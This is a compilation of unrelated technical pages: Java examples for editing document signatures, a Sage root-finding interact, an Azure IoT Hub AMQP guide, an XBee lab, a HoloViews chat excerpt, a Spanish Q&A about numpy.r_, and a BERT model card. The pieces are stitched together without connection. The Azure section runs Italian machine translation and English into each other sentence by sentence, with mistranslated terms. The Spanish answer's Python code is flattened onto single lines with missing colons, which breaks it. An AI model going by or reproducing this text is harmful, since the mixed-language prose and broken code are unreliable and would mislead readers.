"1a5fbc08-4b96-43d9-b650-578b16fbb877"
};
// create list of Barcode Signature by known SignatureId
List<BaseSignature> signatures = new ArrayList<BaseSignature>();
for (String item : signatureIdList)
{
BarcodeSignature temp = new BarcodeSignature(item);
temp.setWidth(150);
temp.setHeight(150);
temp.setLeft(200);
temp.setTop(200);
signatures.add(temp);
}
// update all found signatures
UpdateResult updateResult = signature.update("signed.pdf", signatures);
if (updateResult.getSucceeded().size() == signatures.size())
{
System.out.print("\nAll signatures were successfully updated!");
}
else
{
System.out.print("Successfully updated signatures : "+updateResult.getSucceeded().size());
System.out.print("Not updated signatures : "+updateResult.getFailed().size());
}
How to delete signatures after. Following example demonstrates using ofSearchSearchmethod to find signatures and then remove them over** Delete** method.Deleting signatures after Search
// initialize Signature instance
Signature signature = new Signature("signed.pdf");
BarcodeSearchOptions options = new BarcodeSearchOptions();
List<BarcodeSignature> signatures = signature.search(BarcodeSignature.class, options);
List<BaseSignature> signaturesToDelete = new ArrayList<BaseSignature>();
// collect signatures to delete
for (BarcodeSignature temp : signatures)
{
if (temp.getText().contains("John"))
{
signaturesToDelete.add(temp);
}
}
// delete signatures
DeleteResult deleteResult = signature.delete("signed.pdf",signaturesToDelete);
if (deleteResult.getSucceeded().size() == signaturesToDelete.size())
{
System.out.print("All signatures were successfully deleted!");
}
else
{
System.out.print("Successfully deleted signatures : "+deleteResult.getSucceeded().size());
System.out.print("Not deleted signatures : "+deleteResult.getFailed().size());
}
System.out.print("List of deleted signatures:");
for(BaseSignature temp : deleteResult.getSucceeded())
{
System.out.print("Signature# Id:"+temp.getSignatureId()+", Location: "+temp.getLeft()+"x"+temp.getTop()+". Size: "+temp.getWidth()+"x"+temp.getHeight());
}
How to delete signature using. Following example demonstrates using ofSignatureIdpropertyDeletemethod to remove signatures using knownSignatureIdproperties.
// initialize Signature instance
Signature signature = new Signature(outputFilePath);
// read from some data source signature Id value
String[] signatureIdList = new String[]
{
"a6fec431-111e-4572-950c-5cc5f1c85d36",
"b0123987-b0d4-4004-86ec-30ab5c41ac7e"
};
// create list of Text Signature by known SignatureId
List<BaseSignature> signatures = new ArrayList<BaseSignature>();
for (String item : signatureIdList)
{
signatures.add(new TextSignature(item));
}
// delete required signatures
DeleteResult deleteResult = signature.delete(outputFilePath, signatures);
if (deleteResult.getSucceeded().size() == signatures.size())
{
System.out.print("All signatures were successfully deleted!");
}
else
{
System.out.print("Successfully deleted signatures : " + deleteResult.getSucceeded().size());
System.out.print("Not deleted signatures : " + deleteResult.getFailed().size());
}
Public Developer Guide examples changes
Following topics from Developer Guide were updated:
Basic usage
Sign document with Text signature (advanced)
Sign document with Barcode signature (advanced)
Sign document with QR-code signature (advanced)
Sign document with Image signature (advanced)
Following topics from Developer Guide were added:
Update Text signatures in document
Updating Text signature (advanced)
Delete Text signatures from documents
Deleting Text signatures (advanced)
Update Image signatures in document
Updating Image signatures (advanced)
Delete Image signatures from documents
Deleting Image signatures (advanced)
Update Barcode signatures in document
Updating Barcode signatures (advanced)
Delete Barcode signatures from documents
Deleting Barcode signatures (advanced)
Update QR-code signatures in document
Updating QR-code signatures (advanced)
Delete QR-code signatures from documents
Deleting QR-code signatures (advanced)
Updating multiple signatures of different types
Deleting multiple signatures of different types
Generating document preview (advanced)
Searching for document signatures excluding external components
Handling incorrect document password exception
Handling password required exception
|
Description
Here is a Sage interact that estimates the roots of a function using the bisection method. The user may input the function and the initial endpoints of the estimation range.
Sage Cell
Code
def bisect_method(f, a, b, eps):
try:
f = f._fast_float_(f.variables()[0])
except AttributeError:
pass
intervals = [(a,b)]
two = float(2); eps = float(eps)
while True:
c = (a+b)/two
fa = f(a); fb = f(b); fc = f(c)
if abs(fc) < eps: return c, intervals
if fa*fc < 0:
a, b = a, c
elif fc*fb < 0:
a, b = c, b
else:
raise ValueError("f must have a sign change in the interval (%s,%s)"%(a,b))
intervals.append((a,b))
pretty_print(html("<h1>Double Precision Root Finding Using Bisection</h1>"))
@interact
def _(f = cos(x) - x, a = float(0), b = float(1), eps=(-3,(-16, -1))):
eps = 10^eps
print("eps = %s" % float(eps))
try:
c, intervals = bisect_method(f, a, b, eps)
except ValueError:
print("f must have opposite sign at the endpoints of the interval")
show(plot(f, a, b, color='red'), xmin=a, xmax=b)
else:
print("root =", c)
print("f(c) = %r" % f(x=c))
print("iterations =", len(intervals))
P = plot(f, a, b, color='red')
h = (P.ymax() - P.ymin())/ (1.5*len(intervals))
L = sum(line([(c,h*i), (d,h*i)]) for i, (c,d) in enumerate(intervals) )
L += sum(line([(c,h*i-h/4), (c,h*i+h/4)]) for i, (c,d) in enumerate(intervals) )
L += sum(line([(d,h*i-h/4), (d,h*i+h/4)]) for i, (c,d) in enumerate(intervals) )
show(P + L, xmin=a, xmax=b)
Options
None
Tags
Primary Tags: Single Variable Calculus: Limits and continuity
Secondary Tags: Limits and continuity: Applications - other
Related Cells
None
Attribute
Author: William Stein
Date: 19 Jul 2020 01:53
Submitted by: Zane Corbiere
|
Comunicare con l'hub Internet delle cose usando il protocollo AMQPCommunicate with your IoT hub by using the AMQP Protocol
Hub Internet Azure è in grado di supportare OASIS Advance Message Queueing Protocol (AMQP) versione 1,0 per offrire un'ampia gamma di funzionalità tramite endpoint destinati ai dispositivi e ai servizi.Azure IoT Hub supports OASIS Advanced Message Queuing Protocol (AMQP) version 1.0 to deliver a variety of functionalities through device-facing and service-facing endpoints. Questo documento descrive l'uso dei client AMQP per la connessione a un hub Internet delle cose per usare le funzionalità dell'hub Internet.This document describes the use of AMQP clients to connect to an IoT hub to use IoT Hub functionality.
Client del servizioService client
Connettersi ed eseguire l'autenticazione a un hub Internet (client del servizio)Connect and authenticate to an IoT hub (service client)
Per connettersi a un hub Internet delle cose usando AMQP, un client può usare l'autenticazione con sicurezza basata su attestazioni (CBS) o Simple Authentication and Security Layer (SASL).To connect to an IoT hub by using AMQP, a client can use the claims-based security (CBS) or Simple Authentication and Security Layer (SASL) authentication.
Per il client del servizio sono necessarie le informazioni seguenti:The following information is required for the service client:
InformazioniInformation ValoreValue
Nome host dell'hub InternetIoT hub hostname <iot-hub-name>.azure-devices.net
Nome della chiaveKey name service
Chiave di accessoAccess key Chiave primaria o secondaria associata al servizioA primary or secondary key that's associated with the service
Firma di accesso condivisoShared access signature Una firma di accesso condiviso di breve durata nel formato seguente: SharedAccessSignature sig={signature-string}&se={expiry}&skn={policyName}&sr={URL-encoded-resourceURI} .A short-lived shared access signature in the following format: SharedAccessSignature sig={signature-string}&se={expiry}&skn={policyName}&sr={URL-encoded-resourceURI}. Per ottenere il codice per la generazione della firma, vedere controllare l'accesso all'hubInternet.To get the code for generating this signature, see Control access to IoT Hub.
Il frammento di codice seguente usa la libreria uAMQP in Python per connettersi a un hub Internet delle cose tramite un collegamento al mittente.The following code snippet uses the uAMQP library in Python to connect to an IoT hub via a sender link.
import uamqp
import urllib
import time
# Use generate_sas_token implementation available here:
# https://docs.microsoft.com/azure/iot-hub/iot-hub-devguide-security#security-token-structure
from helper import generate_sas_token
iot_hub_name = '<iot-hub-name>'
hostname = '{iot_hub_name}.azure-devices.net'.format(iot_hub_name=iot_hub_name)
policy_name = 'service'
access_key = '<primary-or-secondary-key>'
operation = '<operation-link-name>' # example: '/messages/devicebound'
username = '{policy_name}@sas.root.{iot_hub_name}'.format(
iot_hub_name=iot_hub_name, policy_name=policy_name)
sas_token = generate_sas_token(hostname, access_key, policy_name)
uri = 'amqps://{}:{}@{}{}'.format(urllib.quote_plus(username),
urllib.quote_plus(sas_token), hostname, operation)
# Create a send or receive client
send_client = uamqp.SendClient(uri, debug=True)
receive_client = uamqp.ReceiveClient(uri, debug=True)
Richiamare messaggi da cloud a dispositivo (client del servizio)Invoke cloud-to-device messages (service client)
Per informazioni sullo scambio di messaggi da cloud a dispositivo tra il servizio e l'hub Internet e tra il dispositivo e l'hub Internet, vedere inviare messaggi da cloud a dispositivo dall'hubInternet.To learn about the cloud-to-device message exchange between the service and the IoT hub and between the device and the IoT hub, see Send cloud-to-device messages from your IoT hub. Il client del servizio usa due collegamenti per inviare messaggi e ricevere commenti e suggerimenti per i messaggi inviati in precedenza dai dispositivi, come descritto nella tabella seguente:The service client uses two links to send messages and receive feedback for previously sent messages from devices, as described in the following table:
Creato daCreated by Tipo collegamentoLink type Percorso collegamentoLink path DescrizioneDescription
ServizioService Collegamento al mittenteSender link /messages/devicebound I messaggi da cloud a dispositivo destinati ai dispositivi vengono inviati al collegamento dal servizio.Cloud-to-device messages that are destined for devices are sent to this link by the service. I messaggi inviati tramite questo collegamento hanno la To proprietà impostata sul percorso di collegamento del ricevitore del dispositivo di destinazione, /devices/<deviceID>/messages/devicebound .Messages sent over this link have their To property set to the target device's receiver link path, /devices/<deviceID>/messages/devicebound.
ServizioService Collegamento ricevitoreReceiver link /messages/serviceBound/feedback Messaggi di feedback di completamento, rifiuto e abbandono che provengono da dispositivi ricevuti su questo collegamento dal servizio.Completion, rejection, and abandonment feedback messages that come from devices received on this link by service. Per altre informazioni sui messaggi di feedback, vedere inviare messaggi da cloud a dispositivo da un hubInternet.For more information about feedback messages, see Send cloud-to-device messages from an IoT hub.
Il frammento di codice seguente illustra come creare un messaggio da cloud a dispositivo e come inviarlo a un dispositivo usando la libreria uAMQP in Python.The following code snippet demonstrates how to create a cloud-to-device message and send it to a device by using the uAMQP library in Python.
import uuid
# Create a message and set message property 'To' to the device-bound link on device
msg_id = str(uuid.uuid4())
msg_content = b"Message content goes here!"
device_id = '<device-id>'
to = '/devices/{device_id}/messages/devicebound'.format(device_id=device_id)
ack = 'full' # Alternative values are 'positive', 'negative', and 'none'
app_props = {'iothub-ack': ack}
msg_props = uamqp.message.MessageProperties(message_id=msg_id, to=to)
msg = uamqp.Message(msg_content, properties=msg_props,
application_properties=app_props)
# Send the message by using the send client that you created and connected to the IoT hub earlier
send_client.queue_message(msg)
results = send_client.send_all_messages()
# Close the client if it's not needed
send_client.close()
Per ricevere commenti e suggerimenti, il client del servizio crea un collegamento al ricevitore.To receive feedback, the service client creates a receiver link. Il frammento di codice seguente illustra come creare un collegamento usando la libreria uAMQP in Python:The following code snippet demonstrates how to create a link by using the uAMQP library in Python:
import json
operation = '/messages/serviceBound/feedback'
# ...
# Re-create the URI by using the preceding feedback path and authenticate it
uri = 'amqps://{}:{}@{}{}'.format(urllib.quote_plus(username),
urllib.quote_plus(sas_token), hostname, operation)
receive_client = uamqp.ReceiveClient(uri, debug=True)
batch = receive_client.receive_message_batch(max_batch_size=10)
for msg in batch:
print('received a message')
# Check content_type in message property to identify feedback messages coming from device
if msg.properties.content_type == 'application/vnd.microsoft.iothub.feedback.json':
msg_body_raw = msg.get_data()
msg_body_str = ''.join(msg_body_raw)
msg_body = json.loads(msg_body_str)
print(json.dumps(msg_body, indent=2))
print('******************')
for feedback in msg_body:
print('feedback received')
print('\tstatusCode: ' + str(feedback['statusCode']))
print('\toriginalMessageId: ' + str(feedback['originalMessageId']))
print('\tdeviceId: ' + str(feedback['deviceId']))
print
else:
print('unknown message:', msg.properties.content_type)
Come illustrato nel codice precedente, un messaggio di feedback da cloud a dispositivo ha un tipo di contenuto Application/vnd.microsoft.iothub.feedback.json.As shown in the preceding code, a cloud-to-device feedback message has a content type of application/vnd.microsoft.iothub.feedback.json. È possibile usare le proprietà nel corpo JSON del messaggio per dedurre lo stato di recapito del messaggio originale:You can use the properties in the message's JSON body to infer the delivery status of the original message:
La chiave
statusCodenel corpo del feedback ha uno dei valori seguenti:Success,expired,DeliveryCountExceeded,rejectedodecancellata.KeystatusCodein the feedback body has one of the following values:Success,Expired,DeliveryCountExceeded,Rejected, orPurged.
La chiave
deviceIdnel corpo del feedback ha l'ID del dispositivo di destinazione.KeydeviceIdin the feedback body has the ID of the target device.
La chiave
originalMessageIdnel corpo del feedback ha l'ID del messaggio da cloud a dispositivo originale inviato dal servizio.KeyoriginalMessageIdin the feedback body has the ID of the original cloud-to-device message that was sent by the service. È possibile usare questo stato di recapito per correlare i feedback ai messaggi da cloud a dispositivo.You can use this delivery status to correlate feedback to cloud-to-device messages.
Ricevere messaggi di telemetria (client del servizio)Receive telemetry messages (service client)
Per impostazione predefinita, l'hub Internet delle cose archivia i messaggi di telemetria del dispositivo inseriti in un hub eventi predefinito.By default, your IoT hub stores ingested device telemetry messages in a built-in event hub. Il client del servizio può usare il protocollo AMQP per ricevere gli eventi archiviati.Your service client can use the AMQP Protocol to receive the stored events.
A questo scopo, il client del servizio deve innanzitutto connettersi all'endpoint dell'hub Internet e ricevere un indirizzo di reindirizzamento per gli hub eventi predefiniti.For this purpose, the service client first needs to connect to the IoT hub endpoint and receive a redirection address to the built-in event hubs. Il client del servizio usa quindi l'indirizzo fornito per connettersi all'hub eventi predefinito.The service client then uses the provided address to connect to the built-in event hub.
In ogni passaggio il client deve presentare le seguenti informazioni:In each step, the client needs to present the following pieces of information:
Credenziali del servizio valide (token di firma di accesso condiviso del servizio).Valid service credentials (service shared access signature token).
Percorso ben formattato della partizione del gruppo di consumer da cui intende recuperare i messaggi.A well-formatted path to the consumer group partition that it intends to retrieve messages from. Per un gruppo di consumer e un ID di partizione specificati, il percorso ha il formato seguente:
/messages/events/ConsumerGroups/<consumer_group>/Partitions/<partition_id>(il gruppo di consumer predefinito è$Default).For a given consumer group and partition ID, the path has the following format:/messages/events/ConsumerGroups/<consumer_group>/Partitions/<partition_id>(the default consumer group is$Default).
Predicato di filtro facoltativo per designare un punto iniziale nella partizione.An optional filtering predicate to designate a starting point in the partition. Questo predicato può essere sotto forma di numero di sequenza, offset o timestamp accodato.This predicate can be in the form of a sequence number, offset, or enqueued timestamp.
import json
import uamqp
import urllib
import time
# Use the generate_sas_token implementation that's available here: https://docs.microsoft.com/azure/iot-hub/iot-hub-devguide-security#security-token-structure
from helper import generate_sas_token
iot_hub_name = '<iot-hub-name>'
hostname = '{iot_hub_name}.azure-devices.net'.format(iot_hub_name=iot_hub_name)
policy_name = 'service'
access_key = '<primary-or-secondary-key>'
operation = '/messages/events/ConsumerGroups/{consumer_group}/Partitions/{p_id}'.format(
consumer_group='$Default', p_id=0)
username = '{policy_name}@sas.root.{iot_hub_name}'.format(
policy_name=policy_name, iot_hub_name=iot_hub_name)
sas_token = generate_sas_token(hostname, access_key, policy_name)
uri = 'amqps://{}:{}@{}{}'.format(urllib.quote_plus(username),
urllib.quote_plus(sas_token), hostname, operation)
# Optional filtering predicates can be specified by using endpoint_filter
# Valid predicates include:
# - amqp.annotation.x-opt-sequence-number
# - amqp.annotation.x-opt-offset
# - amqp.annotation.x-opt-enqueued-time
# Set endpoint_filter variable to None if no filter is needed
endpoint_filter = b'amqp.annotation.x-opt-sequence-number > 2995'
# Helper function to set the filtering predicate on the source URI
def set_endpoint_filter(uri, endpoint_filter=''):
source_uri = uamqp.address.Source(uri)
source_uri.set_filter(endpoint_filter)
return source_uri
receive_client = uamqp.ReceiveClient(
set_endpoint_filter(uri, endpoint_filter), debug=True)
try:
batch = receive_client.receive_message_batch(max_batch_size=5)
except uamqp.errors.LinkRedirect as redirect:
# Once a redirect error is received, close the original client and recreate a new one to the re-directed address
receive_client.close()
sas_auth = uamqp.authentication.SASTokenAuth.from_shared_access_key(
redirect.address, policy_name, access_key)
receive_client = uamqp.ReceiveClient(set_endpoint_filter(
redirect.address, endpoint_filter), auth=sas_auth, debug=True)
# Start receiving messages in batches
batch = receive_client.receive_message_batch(max_batch_size=5)
for msg in batch:
print('*** received a message ***')
print(''.join(msg.get_data()))
print('\t: ' + str(msg.annotations['x-opt-sequence-number']))
print('\t: ' + str(msg.annotations['x-opt-offset']))
print('\t: ' + str(msg.annotations['x-opt-enqueued-time']))
Per un ID dispositivo specificato, l'hub Internet usa un hash dell'ID dispositivo per determinare la partizione in cui archiviare i messaggi.For a given device ID, the IoT hub uses a hash of the device ID to determine which partition to store its messages in. Il frammento di codice precedente illustra il modo in cui gli eventi vengono ricevuti da una singola partizione di questo tipo.The preceding code snippet demonstrates how events are received from a single such partition. Si noti tuttavia che un'applicazione tipica deve spesso recuperare gli eventi archiviati in tutte le partizioni dell'hub eventi.However, note that a typical application often needs to retrieve events that are stored in all event hub partitions.
Client dispositivoDevice client
Connettersi ed eseguire l'autenticazione a un hub Internet (client dispositivo)Connect and authenticate to an IoT hub (device client)
Per connettersi a un hub Internet delle cose usando AMQP, un dispositivo può usare l'autenticazione con sicurezza basata su attestazioni (CBS) o Simple Authentication and Security Layer (SASL) .To connect to an IoT hub by using AMQP, a device can use claims based security (CBS) or Simple Authentication and Security Layer (SASL) authentication.
Per il client del dispositivo sono necessarie le informazioni seguenti:The following information is required for the device client:
InformazioniInformation ValoreValue
Nome host dell'hub InternetIoT hub hostname <iot-hub-name>.azure-devices.net
Chiave di accessoAccess key Chiave primaria o secondaria associata al dispositivoA primary or secondary key that's associated with the device
Firma di accesso condivisoShared access signature Una firma di accesso condiviso di breve durata nel formato seguente: SharedAccessSignature sig={signature-string}&se={expiry}&skn={policyName}&sr={URL-encoded-resourceURI} .A short-lived shared access signature in the following format: SharedAccessSignature sig={signature-string}&se={expiry}&skn={policyName}&sr={URL-encoded-resourceURI}. Per ottenere il codice per la generazione della firma, vedere controllare l'accesso all'hubInternet.To get the code for generating this signature, see Control access to IoT Hub.
Il frammento di codice seguente usa la libreria uAMQP in Python per connettersi a un hub Internet delle cose tramite un collegamento al mittente.The following code snippet uses the uAMQP library in Python to connect to an IoT hub via a sender link.
import uamqp
import urllib
import uuid
# Use generate_sas_token implementation available here:
# https://docs.microsoft.com/azure/iot-hub/iot-hub-devguide-security#security-token-structure
from helper import generate_sas_token
iot_hub_name = '<iot-hub-name>'
hostname = '{iot_hub_name}.azure-devices.net'.format(iot_hub_name=iot_hub_name)
device_id = '<device-id>'
access_key = '<primary-or-secondary-key>'
username = '{device_id}@sas.{iot_hub_name}'.format(
device_id=device_id, iot_hub_name=iot_hub_name)
sas_token = generate_sas_token('{hostname}/devices/{device_id}'.format(
hostname=hostname, device_id=device_id), access_key, None)
# e.g., '/devices/{device_id}/messages/devicebound'
operation = '<operation-link-name>'
uri = 'amqps://{}:{}@{}{}'.format(urllib.quote_plus(username),
urllib.quote_plus(sas_token), hostname, operation)
receive_client = uamqp.ReceiveClient(uri, debug=True)
send_client = uamqp.SendClient(uri, debug=True)
I percorsi di collegamento seguenti sono supportati come operazioni del dispositivo:The following link paths are supported as device operations:
Creato daCreated by Tipo collegamentoLink type Percorso collegamentoLink path DescrizioneDescription
DispositiviDevices Collegamento ricevitoreReceiver link /devices/<deviceID>/messages/devicebound I messaggi da cloud a dispositivo destinati ai dispositivi sono ricevuti su questo collegamento da ogni dispositivo di destinazione.Cloud-to-device messages that are destined for devices are received on this link by each destination device.
DispositiviDevices Collegamento al mittenteSender link /devices/<deviceID>/messages/events I messaggi da dispositivo a cloud inviati da un dispositivo vengono inviati tramite questo collegamento.Device-to-cloud messages that are sent from a device are sent over this link.
DispositiviDevices Collegamento al mittenteSender link /messages/serviceBound/feedback Commenti del messaggio da cloud a dispositivo inviati al servizio tramite questo collegamento da parte dei dispositivi.Cloud-to-device message feedback sent to the service over this link by devices.
Ricevere comandi da cloud a dispositivo (client dispositivo)Receive cloud-to-device commands (device client)
I comandi da cloud a dispositivo inviati ai dispositivi arrivano da un /devices/<deviceID>/messages/devicebound collegamento.Cloud-to-device commands that are sent to devices arrive on a /devices/<deviceID>/messages/devicebound link. I dispositivi possono ricevere questi messaggi in batch e utilizzare il payload dei dati del messaggio, le proprietà del messaggio, le annotazioni o le proprietà dell'applicazione nel messaggio in base alle esigenze.Devices can receive these messages in batches, and use the message data payload, message properties, annotations, or application properties in the message as needed.
Il frammento di codice seguente usa la libreria uAMQP in Python) per ricevere i messaggi da cloud a dispositivo da un dispositivo.The following code snippet uses the uAMQP library in Python) to receive cloud-to-device messages by a device.
# ...
# Create a receive client for the cloud-to-device receive link on the device
operation = '/devices/{device_id}/messages/devicebound'.format(
device_id=device_id)
uri = 'amqps://{}:{}@{}{}'.format(urllib.quote_plus(username),
urllib.quote_plus(sas_token), hostname, operation)
receive_client = uamqp.ReceiveClient(uri, debug=True)
while True:
batch = receive_client.receive_message_batch(max_batch_size=5)
for msg in batch:
print('*** received a message ***')
print(''.join(msg.get_data()))
# Property 'to' is set to: '/devices/device1/messages/devicebound',
print('\tto: ' + str(msg.properties.to))
# Property 'message_id' is set to value provided by the service
print('\tmessage_id: ' + str(msg.properties.message_id))
# Other properties are present if they were provided by the service
print('\tcreation_time: ' + str(msg.properties.creation_time))
print('\tcorrelation_id: ' +
str(msg.properties.correlation_id))
print('\tcontent_type: ' + str(msg.properties.content_type))
print('\treply_to_group_id: ' +
str(msg.properties.reply_to_group_id))
print('\tsubject: ' + str(msg.properties.subject))
print('\tuser_id: ' + str(msg.properties.user_id))
print('\tgroup_sequence: ' +
str(msg.properties.group_sequence))
print('\tcontent_encoding: ' +
str(msg.properties.content_encoding))
print('\treply_to: ' + str(msg.properties.reply_to))
print('\tabsolute_expiry_time: ' +
str(msg.properties.absolute_expiry_time))
print('\tgroup_id: ' + str(msg.properties.group_id))
# Message sequence number in the built-in event hub
print('\tx-opt-sequence-number: ' +
str(msg.annotations['x-opt-sequence-number']))
Inviare messaggi di telemetria (client dispositivo)Send telemetry messages (device client)
È anche possibile inviare messaggi di telemetria da un dispositivo usando AMQP.You can also send telemetry messages from a device by using AMQP. Il dispositivo può facoltativamente fornire un dizionario di proprietà dell'applicazione o varie proprietà del messaggio, ad esempio l'ID del messaggio.The device can optionally provide a dictionary of application properties, or various message properties, such as message ID.
Il frammento di codice seguente usa la libreria uAMQP in Python per inviare messaggi da dispositivo a cloud da un dispositivo.The following code snippet uses the uAMQP library in Python to send device-to-cloud messages from a device.
# ...
# Create a send client for the device-to-cloud send link on the device
operation = '/devices/{device_id}/messages/events'.format(device_id=device_id)
uri = 'amqps://{}:{}@{}{}'.format(urllib.quote_plus(username), urllib.quote_plus(sas_token), hostname, operation)
send_client = uamqp.SendClient(uri, debug=True)
# Set any of the applicable message properties
msg_props = uamqp.message.MessageProperties()
msg_props.message_id = str(uuid.uuid4())
msg_props.creation_time = None
msg_props.correlation_id = None
msg_props.content_type = None
msg_props.reply_to_group_id = None
msg_props.subject = None
msg_props.user_id = None
msg_props.group_sequence = None
msg_props.to = None
msg_props.content_encoding = None
msg_props.reply_to = None
msg_props.absolute_expiry_time = None
msg_props.group_id = None
# Application properties in the message (if any)
application_properties = { "app_property_key": "app_property_value" }
# Create message
msg_data = b"Your message payload goes here"
message = uamqp.Message(msg_data, properties=msg_props, application_properties=application_properties)
send_client.queue_message(message)
results = send_client.send_all_messages()
for result in results:
if result == uamqp.constants.MessageState.SendFailed:
print result
Note aggiuntiveAdditional notes
Le connessioni AMQP potrebbero essere interrotte a causa di un problema di rete o della scadenza del token di autenticazione (generato nel codice).The AMQP connections might be disrupted because of a network glitch or the expiration of the authentication token (generated in the code). Il client del servizio deve gestire tali circostanze e ristabilire la connessione e i collegamenti, se necessario.The service client must handle these circumstances and reestablish the connection and links, if needed. Se un token di autenticazione scade, il client può evitare un calo della connessione tramite il rinnovo proattivo del token prima della scadenza.If an authentication token expires, the client can avoid a connection drop by proactively renewing the token prior to its expiration.
In alcuni casi il client deve essere in grado di gestire correttamente i reindirizzamenti dei collegamenti.Your client must occasionally be able to handle link redirections correctly. Per comprendere tale operazione, vedere la documentazione del client AMQP.To understand such an operation, see your AMQP client documentation.
Passaggi successiviNext steps
Per ulteriori informazioni sulla messaggistica dell'hub Internet, vedere:To learn more about IoT Hub messaging, see:
|
6.2 Lab: Collecting Data in a Computer
In the previous activities we have configured remote XBees from our python program. We have also send data to remote devices using python and the API mode. Now it's time to receive data using python and the API mode.
We should configure the remote computer to periodically gather data from one or more of its pins and send it to the coordinator. The coordinator is configured in mode API 2. In our python program, we create a function that handles the reception of each data packet. We will simply print the received information on the screen.
Code sink_in_server
import serial
import time
from xbee import ZigBee
print 'Asynchronously printing data from remote XBee'
serial_port = serial.Serial('/dev/ttyUSB0', 9600)
def print_data(data):
"""
This method is called whenever data is received.
Its only argument is the data within the frame.
"""
print data['samples']
"""
Make sure the XBee is configured in API mode 2
when using escaped=True
"""
zigbee = ZigBee(serial_port, escaped=True, callback = print_data)
while True:
try:
time.sleep(0.001)
except KeyboardInterrupt:
break
zigbee.halt();
serial_port.close()
Activity:
Decide which data you want to collect and what you want to do with it. Build your protototype and share your expertise with the world. One possibility is to visualize or interpret the data in an original way. Another possible challenge is to activate an actuator in response of the data that have been received. We are getting into unknown territories here, so don't expect it to be easy!
|
philippjfr on highlight_operation
Use df._meta for empty df (compare)
philippjfr on highlight_operation
Fix reduce on empty element Null test over mask area (compare)
jlstevens on highlight_operation
Unchained transformers (compare)
philippjfr on highlight_operation
Correctly look up vdims (compare)
philippjfr on highlight_operation
Fix flake (compare)
philippjfr on highlight_operation
Remove vdims reference (compare)
master into release candidate shape in ~2 weeks and then to get a release out early in the week of the 23rd (before the U.S. Thanksgiving holiday). Let me know how I can help out with review / testing of other PRs. hv.Tiles element, and one thing I'm running into is that the mapbox library that plotly uses expects coordinates in lat/lon (even though they are displayed in Web Mercator). In the past I've done this with pyproj. How would you all feel about the Plotly backend using pyproj as an optional dependency for the Tiles element? @philippjfr scattermapbox trace (for geo scatter plots) that's separate from the scatter trace. Are these the same thing for Bokeh? I'm wondering if I'll need to do something special in the overlay plot logic to check whether to convert the Scatter element into a plotly scatter or scattermapbox trace. hv.Scatter dimension values as web-mercator and would perform the conversion to lat/lon internall during display. hv.Scatter will be of a different type when the hv.Scatter is overlayed with an hv.Tiles element.
import numpy as np
import holoviews as hv
from holoviews import opts
hv.extension('bokeh')
from bokeh.models import HoverTool
from bokeh.models import CustomJSHover
ls = np.linspace(0, 10, 200)
xx, yy = np.meshgrid(ls, ls)
MyCustomZ = CustomJSHover(code='''return "test";''')
MyHover1 = HoverTool(
tooltips=[
( 'newx', '@x'),
( 'newy', '@y'),
( 'newz', '@z{custom}'),
],
formatters={
'x' : 'numeral',
'y' : 'numeral',
'@z' : MyCustomZ,
},
point_policy="follow_mouse"
)
img = hv.Image(np.sin(xx)*np.cos(yy)).opts(tools=[MyHover1])
img
cvs = ds.Canvas(plot_width=700, plot_height=700)
agg = cvs.points(df, 'x_mu', 'y_mu')
|
De acuerdo con el documento numpy / scipy en numpy.r_ aquí , “no es una función, por lo que no toma parámetros”.
Si no es una función, ¿cuál es el término adecuado para “funciones” como numpy.r_ ?
Es una instancia de clase (también conocido como un objeto):
In [2]: numpy.r_ Out[2]:
Una clase es una construcción que se utiliza para definir un tipo distinto, ya que dicha clase permite instancias de sí misma. Cada instancia puede tener propiedades (miembro / variables de instancia y métodos).
Uno de los métodos que puede tener una clase es el método __getitem__ , que se llama siempre que agregue [something,something...something] al nombre de la instancia. En el caso de la instancia numpy.r_ , el método devuelve una matriz numpy.
Tome la siguiente clase, por ejemplo:
class myClass(object) def __getitem__(self,i) return i*2
Mira estas salidas para la clase anterior:
In [1]: a = myClass() In [2]: a[3] Out[2]: 6 In [3]: a[3,4] Out[3]: (3, 4, 3, 4)
Estoy llamando al método __getitem__ de myClass (a través de los paréntesis [] ) y el método __getitem__ está devolviendo (el contenido de una lista * 2 en este caso) – no es la clase / instancia que se comporta como una función, es el __getitem__ Función de la instancia myClass que se está llamando.
En una nota final, notará que para crear myClass instancia de myClass tuve que hacer a = myClass() mientras que para obtener una instancia de RClass usamos numpy.r_ Esto se debe a que numpy crea una instancia de RClass y lo vincula al nombre numpy.r_. Esta es la línea relevante en el código fuente numpy . En mi opinión, esto es bastante feo y confuso!
Yo diría que para todos los propósitos r_ es una función, pero una implementada por un hack inteligente que usa una syntax diferente. Mike ya explicó cómo r_ en realidad no es una función, sino una instancia de clase de RClass , que tiene implementado __getitem__ , de modo que puede usarlo como r_[1] . La diferencia estética es que utiliza corchetes en lugar de curvos, por lo que no está haciendo una llamada de función, pero en realidad está indexando el objeto. Aunque esto es técnicamente cierto, para todos los propósitos, funciona igual que una llamada de función, pero que permite cierta syntax adicional no permitida por una función normal.
La motivación para crear r_ probablemente proviene de la syntax de Matlab, que permite construir matrices de una manera muy compacta, como x = [1:10, 15, 20:10:100] . Para lograr lo mismo en números, tendrías que hacer x = np.hstack((np.arange(1,11), 15, np.arange(20,110,10))) . El uso de dos puntos para crear rangos no está permitido en python, pero existen en forma de notación de división para indexar en una lista, como L[3:5] , e incluso A[2:10, 20:30] para múltiples matrices tridimensionales. Bajo el capó, esta notación de índice se transforma en una llamada al método __getitem__ del objeto, donde la notación de dos puntos se transforma en un objeto de división:
In [13]: class C(object): ...: def __getitem__(self, x): ...: print x In [14]: c = C() In [15]: c[1:11, 15, 20:110:10] (slice(1, 11, None), 15, slice(20, 110, 10))
El objeto r_ ‘abusa’ de este hecho para crear una ‘función’ que acepta la notación de división, que también hace algunas cosas adicionales, como concatenar todo y devolver el resultado, para que pueda escribir x = np.r_[1:11, 15, 20:110:10] . El “No es una función, así que no toma parámetros” en la documentación es ligeramente engañoso …
|
bert-base-en-lt-cased
We are sharing smaller versions of bert-base-multilingual-cased that handle a custom number of languages.
Unlike distilbert-base-multilingual-cased, our versions give exactly the same representations produced by the original model which preserves the original accuracy.
For more information please visit our paper: Load What You Need: Smaller Versions of Multilingual BERT.
How to use
from transformers import AutoTokenizer, AutoModel
tokenizer = AutoTokenizer.from_pretrained("Geotrend/bert-base-en-lt-cased")
model = AutoModel.from_pretrained("Geotrend/bert-base-en-lt-cased")
To generate other smaller versions of multilingual transformers please visit our Github repo.
How to cite
@inproceedings{smallermbert,
title={Load What You Need: Smaller Versions of Mutlilingual BERT},
author={Abdaoui, Amine and Pradel, Camille and Sigel, Grégoire},
booktitle={SustaiNLP / EMNLP},
